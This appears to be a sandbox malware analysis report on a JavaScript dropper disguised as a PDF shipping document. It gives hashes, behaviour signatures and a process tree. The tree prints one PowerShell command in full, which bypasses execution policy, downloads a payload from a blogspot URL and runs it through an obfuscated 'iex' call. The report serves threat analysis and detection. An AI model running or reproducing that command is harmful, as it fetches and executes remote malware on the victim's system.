Analysis
- max time kernel: 117s
- max time network: 118s
- platform: windows7_x64
- resource: win7-20231215-en
- resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
- submitted: 17-01-2024 13:40
Static task
- static1
Behavioral task
- behavioral1
  - Sample: BL#ACU240141 & Doc#HLCUBKK240124139.pdf .js
  - Resource: win7-20231215-en
Behavioral task
- behavioral2
  - Sample: BL#ACU240141 & Doc#HLCUBKK240124139.pdf .js
  - Resource: win10v2004-20231222-en
General
- Target: BL#ACU240141 & Doc#HLCUBKK240124139.pdf .js
- Size: 1.4MB
- MD5: 286d534eb759c671fa9e79cfafd3bc85
- SHA1: d165938c1c607618c5cb6d9d11cf5b371f007ac7
- SHA256: 77109ba56a5e70fafe88a10800764ec30d35727c1ff8cdb2934534ae8c7e048b
- SHA512: 3b1ee1a647b623265ad7e90d786e61cafe6ca5e312676dafcc198763cf8efe3f479fb66b4aae9d1e7289ec5433055ab193ffd91abefc732e3d337d4fe987119b
- SSDEEP: 192:FQzfvQzrHHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHHnHHHHHHf:efYzD
Malware Config
Signatures
- Deletes itself (1 IoC)
  Processes: wscript.exe (PID 2288)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes: powershell.exe (PID 2208)
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powershell.exe (PID 2208), Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes:
  - PID 2288 (wscript.exe) wrote to memory of PID 2208 (powershell.exe)
  - PID 2288 (wscript.exe) wrote to memory of PID 2208 (powershell.exe)
  - PID 2288 (wscript.exe) wrote to memory of PID 2208 (powershell.exe)
Processes
- [1] C:\Windows\system32\wscript.exe
  Command line: wscript.exe "C:\Users\Admin\AppData\Local\Temp\BL#ACU240141 & Doc#HLCUBKK240124139.pdf .js"
  - Deletes itself
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of [1])
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm simoubizw.blogspot.com///////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 6
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- memory/2208-4-0x000000001B660000-0x000000001B942000-memory.dmp (Filesize: 2.9MB)
- memory/2208-5-0x00000000023C0000-0x00000000023C8000-memory.dmp (Filesize: 32KB)
- memory/2208-10-0x0000000002C80000-0x0000000002D00000-memory.dmp (Filesize: 512KB)
- memory/2208-9-0x0000000002C80000-0x0000000002D00000-memory.dmp (Filesize: 512KB)
- memory/2208-8-0x0000000002C80000-0x0000000002D00000-memory.dmp (Filesize: 512KB)
- memory/2208-7-0x0000000002C80000-0x0000000002D00000-memory.dmp (Filesize: 512KB)
- memory/2208-11-0x000007FEF5430000-0x000007FEF5DCD000-memory.dmp (Filesize: 9.6MB)
- memory/2208-6-0x000007FEF5430000-0x000007FEF5DCD000-memory.dmp (Filesize: 9.6MB)
- memory/2208-12-0x000007FEF5430000-0x000007FEF5DCD000-memory.dmp (Filesize: 9.6MB)